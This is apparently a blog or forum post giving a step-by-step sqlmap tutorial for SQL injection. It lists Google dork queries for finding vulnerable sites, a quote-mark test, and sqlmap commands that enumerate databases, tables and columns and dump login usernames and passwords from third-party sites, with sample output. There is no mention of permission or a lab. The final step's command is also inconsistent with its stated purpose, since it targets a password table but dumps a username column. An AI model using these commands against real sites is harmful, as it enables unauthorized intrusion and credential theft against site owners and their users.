SQLiMAP
Here is a fast TUT on SQLImap kinda crapy TUT hope it helps(1) Pick a target buy Google searching one of these
inurl:index.php?id=1
inurl:trainers.php?id=1
inurl:buy.php?category=1
inurl:article.php?ID=1
inurl:play_old.php?id=1
inurl:declaration_more.php?decl_id=1
inurl:pageid=1
inurl:games.php?id=1
(2) click on a website and test if you can do a SQLI by adding a ' at the end of the URL
then you should get an error if you don't move on.
EX.. https://www.targetsite.com/page.php?id=1'
(3) then copy the URL without the ' and open sqlmap
(4) sqlmap -u https://www.targetsite.com/page.php?id=1 --dbs
(5) it should show you the Available databases and how many. now pick the one
you want to open first lets say there are 2 databases named (boobies) as the
first one and vizio as the (second) database
(6) sqlmap -u https://www.targetsite.com/page.php?id=1 -D boobies --table
D is dot database and --table is what you want to open inside it
(7) it should open that database up and show you all the tables lets say there is 3 tables
es_cms_news
es_cms_login
es_cms_users
now find the ones of course named users and logins and copy and past the ones you want in a
text editor ..... es_cms_login es_cms_users
(8) Now to open the columns. so type
sqlmap -u https://www.targetsite.com/page.php?id=1 -D boobies -T es_cms_login --columns
-T for tables and then paste what you wanna open then --columns
(9) now you might see something like this
columns | types
--------------------
cookies char(32)
password char(31)
username char(20)
now lets get the username and passwords:D
(10) sqlmap -u https://www.targetsite.com/page.php?id=1 -D boobies -T es_cms_login -C username --dump
-C is for what column you want then paste what you wanna open this case username and --dump
basically dumping everything in front of you.
(11) then woot woot look you should see all the usernames
|username|
------
admin admin is the username
sexybetty
(12) lets get the password.
sqlmap -u https://www.targetsite.com/page.php?id=1 -D boobies -T es_cms_password -C username --dump
then should get something like this
|password|
------
bigpappa
sweatynuts
0 comments: